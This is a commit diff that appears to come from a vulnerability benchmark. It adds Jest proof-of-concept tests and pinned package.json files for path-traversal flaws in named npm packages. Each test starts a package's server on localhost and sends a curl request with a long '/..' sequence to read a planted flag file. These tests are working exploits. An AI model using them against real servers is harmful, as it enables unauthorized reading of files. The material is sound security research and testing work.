new structure with updated package.json

cristianstaicu · Dec 29, 2021 · 96181e2 · 96181e2
1 parent 9256a5e
commit 96181e2
Show file tree

Hide file tree

Showing 586 changed files with 9,105 additions and 0 deletions.
diff --git a/path-traversal/11xiaoli_1.1.0/11xiaoli.test.js b/path-traversal/11xiaoli_1.1.0/11xiaoli.test.js
@@ -0,0 +1,28 @@
+//
+const path = require("path");
+const { sleep } = require("sleep");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in 11xiaoli", (done) => {
+  const fs = require("fs");
+  const sleep = require("sleep");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  let server = "node ./node_modules/11xiaoli/dome.js"; //to start the server
+  let exe = exec(server, (error, stdout) => {}); //starting the server
+  //console.log(exe.pid)
+  sleep.sleep(2);
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8888${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    //attack
+    expect(stdout).toBe(hostsFile);
+
+    done();
+  });
+});
diff --git a/path-traversal/11xiaoli_1.1.0/package.json b/path-traversal/11xiaoli_1.1.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "11xiaoli": "1.1.0"
+  }
+}
diff --git a/path-traversal/22lixian_1.0.0/22lixian.test.js b/path-traversal/22lixian_1.0.0/22lixian.test.js
@@ -0,0 +1,26 @@
+//
+const path = require("path");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in 22lixian", (done) => {
+  const fs = require("fs");
+  const sleep = require("sleep");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  let server = "node ./node_modules/22lixian/demo.js"; //to start the server
+  exec(server, (error, stdout) => {}); //starting the server
+
+  sleep.sleep(2);
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8888${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    //attack
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+});
diff --git a/path-traversal/22lixian_1.0.0/package.json b/path-traversal/22lixian_1.0.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "22lixian": "1.0.0"
+  }
+}
diff --git a/path-traversal/360class.jansenhm_0.1.1/package.json b/path-traversal/360class.jansenhm_0.1.1/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "360class.jansenhm": "0.1.1"
+  }
+}
diff --git a/path-traversal/@vivaxy-here_3.1.0/package.json b/path-traversal/@vivaxy-here_3.1.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "@vivaxy/here": "3.1.0"
+  }
+}
diff --git a/path-traversal/@vivaxy-here_3.1.0/vivaxy_here.test.js b/path-traversal/@vivaxy-here_3.1.0/vivaxy_here.test.js
@@ -0,0 +1,28 @@
+//
+const path = require("path");
+const { sleep } = require("sleep");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in @vivaxy/here", (done) => {
+  const fs = require("fs");
+  const sleep = require("sleep");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  let server = "node ./node_modules/@vivaxy/here/index.js"; //to start the server
+  let exe = exec(server, (error, stdout) => {}); //starting the server
+  //console.log(exe.pid)
+  sleep.sleep(2);
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:3000${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    //attack
+    expect(stdout).toBe(hostsFile);
+
+    done();
+  });
+});
diff --git a/path-traversal/README.md b/path-traversal/README.md
diff --git a/path-traversal/aaa.js b/path-traversal/aaa.js
@@ -0,0 +1,9 @@
+var config = {
+  localhost: {
+    backend: __dirname + "/",
+    frondend: __dirname + "/",
+    baseTemp: "index.html",
+  },
+};
+var pkg = require("web-node-server");
+pkg.start(config);
diff --git a/path-traversal/actionhero_1.0.2/package.json b/path-traversal/actionhero_1.0.2/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "actionhero": "1.0.2"
+  }
+}
diff --git a/path-traversal/adm-zip_0.5.0/package.json b/path-traversal/adm-zip_0.5.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "adm-zip": "0.5.0"
+  }
+}
diff --git a/path-traversal/algo-httpserv_1.1.0/package.json b/path-traversal/algo-httpserv_1.1.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "algo-httpserv": "1.1.0"
+  }
+}
diff --git a/path-traversal/angular-http-server_1.0.0/angular-http-server.test.js b/path-traversal/angular-http-server_1.0.0/angular-http-server.test.js
@@ -0,0 +1,28 @@
+//
+const path = require("path");
+const { sleep } = require("sleep");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in angular-http-server", (done) => {
+  const fs = require("fs");
+  const sleep = require("sleep");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  let server = "node ./node_modules/angular-http-server/angular-http-server.js"; //to start the server
+  let exe = exec(server, (error, stdout) => {}); //starting the server
+  //console.log(exe.pid)
+  sleep.sleep(2);
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8000${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    //attack
+    expect(stdout).toBe(hostsFile);
+
+    done();
+  });
+});
diff --git a/path-traversal/angular-http-server_1.0.0/package.json b/path-traversal/angular-http-server_1.0.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "angular-http-server": "1.0.0"
+  }
+}
diff --git a/path-traversal/api-proxy_0.0.2/api-proxy.test.js b/path-traversal/api-proxy_0.0.2/api-proxy.test.js
@@ -0,0 +1,22 @@
+//https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/api-proxy/test.js
+const path = require("path");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in api-proxy", (done) => {
+  const fs = require("fs");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  require("api-proxy").start(8888); //starting the server.
+
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8888${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+});
diff --git a/path-traversal/api-proxy_0.0.2/package.json b/path-traversal/api-proxy_0.0.2/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "api-proxy": "0.0.2"
+  }
+}
diff --git a/path-traversal/aso-server_0.4.3/package.json b/path-traversal/aso-server_0.4.3/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "aso-server": "0.4.3"
+  }
+}
diff --git a/path-traversal/asset-cache_0.0.6/asset-cache.test.js b/path-traversal/asset-cache_0.0.6/asset-cache.test.js
@@ -0,0 +1,23 @@
+//https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/asset-cache/test.js
+const path = require("path");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in asset-cache", (done) => {
+  const pkg = require("asset-cache");
+  const fs = require("fs");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  pkg.listen(9000, function () {});
+
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:9000${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+});
diff --git a/path-traversal/asset-cache_0.0.6/package.json b/path-traversal/asset-cache_0.0.6/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "asset-cache": "0.0.6"
+  }
+}
diff --git a/path-traversal/atompm_0.8.0/package.json b/path-traversal/atompm_0.8.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "atompm": "0.8.0"
+  }
+}
diff --git a/path-traversal/atropa-ide_0.2.2-2/atropa-ide.test.js b/path-traversal/atropa-ide_0.2.2-2/atropa-ide.test.js
@@ -0,0 +1,26 @@
+//https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/atropa-ide/test.js
+const path = require("path");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in atropa-ide", (done) => {
+  const ide = require("atropa-ide");
+  const fs = require("fs");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  const path = require("path");
+  let port = 8884;
+  let serverRoot = path.resolve(__dirname);
+  ide.start(port, serverRoot);
+
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8884${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+});
diff --git a/path-traversal/atropa-ide_0.2.2-2/package.json b/path-traversal/atropa-ide_0.2.2-2/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "atropa-ide": "0.2.2-2"
+  }
+}
diff --git a/path-traversal/atropa-server_0.5.2/package.json b/path-traversal/atropa-server_0.5.2/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "atropa-server": "0.5.2"
+  }
+}
diff --git a/path-traversal/augustine_0.2.3/augustine.test.js b/path-traversal/augustine_0.2.3/augustine.test.js
@@ -0,0 +1,26 @@
+//https://hackerone.com/reports/296282
+const path = require("path");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in augustine", (done) => {
+  const fs = require("fs");
+  const sleep = require("sleep");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  let server = "node ./node_modules/augustine/bin/augustine.js -p 8968"; //to start the server
+  exec(server, (error, stdout) => {}); //starting the server
+
+  sleep.sleep(2);
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8968${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    //attack
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+});
diff --git a/path-traversal/augustine_0.2.3/package.json b/path-traversal/augustine_0.2.3/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "augustine": "0.2.3"
+  }
+}
diff --git a/path-traversal/awning_0.1.0/awning.test.js b/path-traversal/awning_0.1.0/awning.test.js
@@ -0,0 +1,23 @@
+//
+const path = require("path");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in awning", (done) => {
+  const Awning = require("awning").HttpServer;
+  const fs = require("fs");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  let server = new Awning(8886);
+
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:8886${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+});
diff --git a/path-traversal/awning_0.1.0/package.json b/path-traversal/awning_0.1.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "awning": "0.1.0"
+  }
+}
diff --git a/path-traversal/badjs-sourcemap-server_0.0.1/package.json b/path-traversal/badjs-sourcemap-server_0.0.1/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "badjs-sourcemap-server": "0.0.1"
+  }
+}
diff --git a/path-traversal/bae-nodejs_1.0.0/bae-nodejs.test.js b/path-traversal/bae-nodejs_1.0.0/bae-nodejs.test.js
@@ -0,0 +1,27 @@
+//https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/bae-nodejs/test.js
+const path = require("path");
+const { sleep } = require("sleep");
+const pathToFlag = path.resolve(__dirname, "../flag.html");
+
+function genstr(n) {
+  return "/..".repeat(50) + pathToFlag;
+}
+
+test("Path Traversal in bae-nodejs", (done) => {
+  const pkg = require("bae-nodejs");
+  const fs = require("fs");
+  const { exec } = require("child_process");
+  let hostsFile = fs.readFileSync(pathToFlag).toString();
+
+  pkg.start(__dirname);
+
+  let attack_string = `curl -v --path-as-is "http://127.0.0.1:18080${genstr()}"`;
+
+  exec(attack_string, (error, stdout) => {
+    expect(stdout).toBe(hostsFile);
+    done();
+  });
+
+  // sleep(15);
+  // exec('killall node', (error, stdout) => {})
+});
diff --git a/path-traversal/bae-nodejs_1.0.0/package.json b/path-traversal/bae-nodejs_1.0.0/package.json
@@ -0,0 +1,5 @@
+{
+  "dependencies": {
+    "bae-nodejs": "1.0.0"
+  }
+}